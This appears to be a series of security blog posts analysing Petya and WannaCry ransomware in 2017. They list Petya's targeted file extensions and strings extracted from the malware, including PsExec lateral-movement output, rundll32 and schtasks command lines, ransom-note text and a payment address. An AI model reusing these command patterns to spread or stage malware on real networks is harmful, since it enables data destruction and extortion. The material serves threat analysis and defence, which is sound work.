Looks out for the extensions it wants to encrypt (hard-coded, different to the ones seen earlier in Petya mid-2016).

Encryption part.

And here are all the encryption functions that are called.

Like I said earlier, this is a quick look into the malware, not a detailed analysis. But it should give you some insight into how it works.



Tuesday, June 27, 2017

Petya extensions targeted

.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb
.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql
.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.

Petya Mem Strings

Some interesting strings pulled from the Petya executable:

<assemblyIdentity
    version="5.1.0.0"
    processorArchitecture="x86"
    name="Microsoft.Windows.Shutdown"
    type="win32"
<description>Windows Shutdown and Annotation Tool</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel
                level="asInvoker"
                uiAccess="false"
            />
        </requestedPrivileges>
    </security>
</trustInfo>
</assembly>


00026671-00002512,dllhost.dat,"%WINDIR%\dllhost.dat",2512,2880,2017-6-27.07:45:34.603,"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"""

c:\src\Pstools\psexec\EXE\Release\psexec.pdb
c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb

Direct PsExec to run the application on the remote
computer or computers specified. If you omit the computer
ComputerName
CONIN$
Connecting to 192.168.xx.xx...
Connecting to 192.168.xx.xx...
Starting PsExec service on 192.168.xx.xx...
Connecting with PsExec service on 192.168.xx.xx...
Starting %WINDIR%\System32\rundll32.exe on 192.168.xx.xx...
Connecting with PsExec service on 192.168.xx.xx...
ConnectNamedPipe
CONOUT$
ControlService

that file and print sharing services are enabled on %s.
the password is transmitted in clear text to the remote system.
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.

Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
UseDelayedAcceptance


00024659-00002880,rundll32.exe,"%WINDIR%\System32\rundll32.exe",2880,2292,2017-6-27.06:42:15.996,"C:\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1""
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
2.    Send your Bitcoin wallet ID and personal installation key to e-mail
[j j
\Sessions\1\Windows\ApiPort
\ThemeApiPort
AddressFamily
AppData
AQIAAA5mAAAApAAA6vAGjmKL1o/z1WoWFbD8HoXQxvta/l23/sisYXlY3R/b2LYb
GBVOO2YNwJuwEsKdn6WHHKMbDnT/orfba9XaLwwelJeehFIraOnQSXSuVih7CWRJ
AuthenticodeEnabled
AutodialDLL


DhcpDomain
DhcpNameServer
Dhcpv6Domain
Disable
DisableBranchCache
DisableEngine
DisableImprovedZoneCheck
DisableLocalOverride
DisableMetaFiles
DisableUserModeCallbackFilter
DisplayString
dllhost.dat


Enabled
EnableDhcp
EnableLinkedConnections
EnablePunycode
Export
FE04.tmp
FipsAlgorithmPolicy
HelperDllName
Hostname
Image Path
l your files safely and easily.  All you
 need to do is submit the payment and purchase the decryption key.
 Please follow the instructions:
 1. Send $300 worth of Bitcoin to following address:


Ooops, your important files are encrypted.
If you see this text, then your files are no longer accessible, because
they have b
PackedCatalogItem
PageAllocatorSystemHeapIsPrivate


TROY ALL OF YOUR DATA! PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED
  IN!
Type
UseDelayedAcceptance
UseHostnameAsAlias
UseOldHostResolutionOrder
Users
Version
Webclient
Windows
WinHttpSettings
WinSock 2.0 Provider ID
WinSock_Registry_Version
wowsmith123456@posteo.net.


00026129-00001968,FE04.tmp,"%TEMP%\FE04.tmp",1968,2880,2017-6-27.06:45:10.817,"%TEMP%\FE04.tmp" \\.\pipe\{E532AB34-D5C5-4AA8-9511-A05572AE75BC}""
%OSUSER%-PC\%OSUSER%:123456


00026131-00002720,schtasks.exe,"%WINDIR%\System32\schtasks.exe",2720,2724,2017-6-27.06:45:08.804,"" /TR "%WINDIR%\system32\shutdown.exe /r /f" /ST 07:45""
(40,4):LogonType:
ERROR:
ERROR: No mapping between account names and security IDs was done.
No mapping between account names and security IDs was done.
00026195-00002796,shutdown.exe,"%WINDIR%\System32\shutdown.exe",2796,1820,2017-6-27.06:45:09.425,"%WINDIR%\system32\shutdown.exe" /r /f""
0 0(000


Shutdown and Annotation Tool
00026671-00002512,dllhost.dat,"%WINDIR%\dllhost.dat",2512,2880,2017-6-27.07:45:34.603,"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"""
!This program cannot be run in DOS mode.
"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"


%WINDIR%\System32\rundll32.exe started on 192.168.56.11 with process ID 2996.

 

Tuesday, May 30, 2017

Python: converting Shodan CSV into IOCs CSV

This is a small script that converts the CSV downloaded from Shodan into a new CSV that is usable for ingesting into other platforms (e.g. ThreatConnect). You can grab the IOC column (e.g. IPs) and create a new CSV file with just that column; this new CSV can then be ingested into any other platform. You can pick and choose which column(s) you want to carry over into the new CSV; minor tweaks would be required. I'll keep updating this script and make it as interactive as possible. Watch the GitHub repo!
Get it here.



Tuesday, May 23, 2017

Sunday, May 14, 2017

Malware: WannaCry RansomWare - Infection Vector unlikely to be Phishing

By now, the whole world has heard of the new ransomware WannaCry and its variants. Some of you might be wondering why there hasn't been anything posted here on this site regarding the phishing aspect of the campaign. The reason is quite simple. Unlike what many security vendors have reported, it is highly unlikely that the infection is being spread through phishing campaigns. The malware is targeting victims across the world, based on the well-known SMBv1 vulnerability that was released by ShadowBrokers very recently. It is looking like the internet is being scanned for vulnerable computers, which are then attacked with the malware.

Easy wins: disable SMB, make sure you are not blocking the killSwitch.

There is a lot of reporting around this now but most of it is just re-tweets and news stories which add little to nothing to the real campaign.

Here's a good RE paper from Jake Williams on the payload.
And here's the tool that you can use to prevent WannaCry infections if you can't patch your systems.



Wednesday, May 10, 2017